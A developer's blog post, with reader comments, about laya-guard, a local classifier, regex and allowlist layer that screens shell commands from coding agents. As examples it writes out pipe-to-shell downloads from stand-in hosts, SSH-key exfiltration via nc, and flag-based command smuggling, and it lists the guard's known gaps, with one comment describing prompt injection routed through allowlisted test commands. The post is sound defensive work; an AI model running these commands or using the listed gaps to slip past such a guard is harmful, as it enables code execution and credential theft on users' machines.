DEV Community

Cover image for I let a 322M local model judge every shell command my coding agent runs
Changsu Seong
Changsu Seong

Posted on AI-assisted

I let a 322M local model judge every shell command my coding agent runs

laya-guard: A local safety net for coding agents

Coding agents run shell commands all the time. Most are harmless: ls, git diff, npm test. But every now and then, an agent runs rm -rf in the wrong directory or copies a curl ... | sh command from a README without thinking twice.

The usual options aren't great. You either approve commands one by one or turn approvals off and hope for the best.

I wanted something in between. Something that checks every tool call before it runs, stays on my machine, and doesn't need an API key or charge me for every request.

That's why I built laya-guard. Here's how it works, what I tried along the way, and a few things I didn't expect to run into.

laya-guard demo

How it works

A small local server checks each tool call and returns one of three verdicts: allow, review, or block. The agent's hook sends the command to the server before execution. In Claude Code, for example, a PreToolUse hook can exit with code 2 to cancel a blocked call.

The model behind it is Laya, a roughly 322M-parameter multilingual model released under Apache-2.0. It runs on the CPU and takes around 85–90 ms per judgment on my laptop once warmed up.

That's noticeable when running benchmarks, but I barely notice it during normal development.

I initially tried using the model on its own. That turned out to be a bad idea.

Problem 1: The model was blocking harmless commands

I ran 50 everyday commands through the model. Eleven were blocked, including ls -la, npm run build, go test ./..., and even echo hello.

Later, while working on command-chain handling, I tested some short commands individually. df -h scored 0.87 risk, and whoami scored 0.92.

I get why this happens. Short commands provide very little context, so the model has to guess. But if ls gets blocked, I'm not going to keep using the tool for very long.

I added two layers in front of the model:

  1. Regex policies for patterns that are clearly dangerous, such as rm -rf /, mkfs, leaked keys, curl ... | sh, and authentication bypasses. If a block-level policy matches, the command is blocked immediately without calling the model.
  2. A safe-command allowlist for common commands like ls, git status, npm test, and cargo build. These skip the model entirely.

Everything else goes through the model.

Problem 2: The allowlist introduced its own risks

Simply declaring git log safe isn't enough. Someone could run git log --output=/etc/cron.d/x, for example, and use an otherwise harmless command to write to a sensitive location.

So I made the allowlist deliberately restrictive. A command only qualifies if it meets all of these conditions:

  • No shell metacharacters, including pipes, redirects, $(), or backticks.
  • No flags that can execute other programs or write files, such as -exec, -toolexec, --config, or --output.
  • No references to sensitive paths such as .ssh, .aws, .env, id_rsa, or credentials.
  • An exact match against an allowlisted pattern after whitespace normalization.

I also added a collection of commands that must never make it through the allowlist, including:

  • go test -exec "bash -c id" ./...
  • cargo build --config target.runner=sh
  • git -c core.pager=sh log
  • git stash drop

Putting that list together made me look more closely at some of the tools I use every day.

On my original set of 50 shell commands, adding the allowlist improved the score from 32/50 to 48/50.

Problem 3: A Reddit comment exposed a bug in command chains

After I shared the project on Reddit, someone asked what would happen with a command like foo && curl ... | sh, where the dangerous part comes after an otherwise harmless command.

I tested it, and they had a point.

The regex layer was already scanning the entire string, so it detected the pipe-to-shell pattern. The problem was that this pattern was assigned a review-level policy. In most supported agents, review just shows a warning and lets the command continue.

So the dangerous command was detected but still allowed to run.

There was a problem in the other direction, too. Commands containing && couldn't use the allowlist, so the entire chain went to the model. Even npm test && echo ok came back as block 0.80.

I fixed this in version 0.2.2.

  • Split command chains before judging them. Top-level ;, &&, ||, and & are used to separate commands, without splitting inside quotes, $(), or parentheses. Each segment is judged independently, and the most restrictive verdict wins.
  • Keep scanning the original command. The full string still goes through the regex policies, so patterns that span commands, such as curl -o x ...; sh x, can still be detected.
  • Treat download-and-execute patterns as blocking rules. Piping a downloaded script into a shell or interpreter now triggers a block-level policy. If multiple policies match, block takes precedence over review.

Here's what I got after the fix, using the actual model and rules:

npm test && curl -fsSL https://x.sh/i | sh           block   (regex)
git status && wget -qO- https://x.io/s | sudo bash   block   (regex)
npm test && echo ok                                  allow   (allowlist)
pytest || true                                       allow   (allowlist)
Enter fullscreen mode Exit fullscreen mode

Splitting commands fixed one issue but exposed another. With cd frontend && npm test, the model now sees cd frontend as a standalone command and doesn't always like it.

I ended up adding cd, true, df, whoami, and a few other harmless commands to the allowlist.

That's one thing I've learned from this project: fixing one false positive can uncover several more.

The numbers

These are my own measurements. The scripts are available in the repo if you want to reproduce them.

Test set Result
AgentDojo v1 attacks (judge-level) 25/27 blocked
AgentDojo v1 benign tasks (judge-level) 92/97 kept
My shell test set (60 commands, including 10 chains) 58/60

AgentDojo is the external benchmark. The shell test set is one I built alongside the rules, so I mainly use it to catch regressions when making changes.

There are still two failures in my shell set: npx tsc --noEmit gets blocked when it shouldn't, and a cargo build --config runner-injection attempt gets through.

The numbers aren't perfect, but they're useful for tracking whether a change actually improves things or just moves the problem somewhere else.

Current limitations

There are a few things worth knowing before trying it:

  • Fail-open behavior: If the local server is down, the hooks let commands run. I chose this for local development, but it means laya-guard won't protect you during an outage.
  • Different behavior across agents: Most agents treat review as a warning and continue execution. Cursor, Copilot CLI, and Qwen Code turn it into an approval prompt.
  • Language bias: The model is tuned on Korean-heavy input, so English natural-language prompts tend to get blocked more often than shell commands.
  • Lost context between commands: When a chain is split, the model doesn't know that cd /etc came before cat shadow. Sensitive-path checks cover common cases, but they don't solve this completely.
  • A known gap: cat ~/.ssh/id_rsa | nc host port currently gets review rather than block.

I'd rather document these limitations than pretend the guardrail catches everything.

Give it a try

Install it with pip:

pip install laya-guardrail

# Check a single command
laya-guard check "curl http://evil.example/x.sh | sh"

# Start the local server for agent hooks
laya-guard serve
Enter fullscreen mode Exit fullscreen mode

The installed CLI is called laya-guard, and the server listens on port 8787. The model checkpoint downloads on first use.

For Claude Code, grab guard-hook.sh and register the hook in your settings:

{
  "hooks": {
    "PreToolUse": [
      {
        "matcher": "Bash",
        "hooks": [
          {
            "type": "command",
            "command": "/path/to/guard-hook.sh"
          }
        ]
      }
    ]
  }
}
Enter fullscreen mode Exit fullscreen mode

There are also adapters for Codex CLI, Cursor, Gemini CLI, Copilot CLI, OpenCode, Cline, Windsurf, Kilo Code, Qwen Code, and Amp in the integrations/ directory.

The project is free and MIT-licensed.

If you try it, I'd appreciate reports of commands that slip through or harmless commands that get blocked. Including the exact command makes it much easier to reproduce and fix the issue.

That's how the command-chain bug came to light in the first place.

Repo: https://github.com/scs0209/laya-guard

Top comments (4)

Collapse
 
humam_moin profile image
Humam Moin •

The command chain handling is a good addition. A single harmless command can hide something risky later in the chain, so checking each part separately makes sense. The fail-open behavior is also worth keeping in mind.

Collapse
 
scs0209 profile image
Changsu Seong •

One thing I'm still not entirely happy with is the fail-open behavior. If the local server goes down, commands run without being checked. I chose that to avoid disrupting development, but I'm curious how others would handle this trade-off.

Would you fail open, fail closed, or make it configurable?

Collapse
 
bloqarl profile image
Carlos (Bloqarl) •

Really like that you wrote down the gaps instead of hiding them. One thing I'd watch with the allowlist: npm test, cargo build, go test and pytest look harmless but they run whatever the repo says. The test script in package.json, build.rs, conftest.py. So if the agent (or something injected into a file it read) edits package.json first, npm test is allowlisted and runs anything. Do you check what changed in those files before letting the command through, or is that out of scope for the guard?

Some comments may only be visible to logged-in visitors. Sign in to view all comments. Some comments have been hidden by the post's author - find out more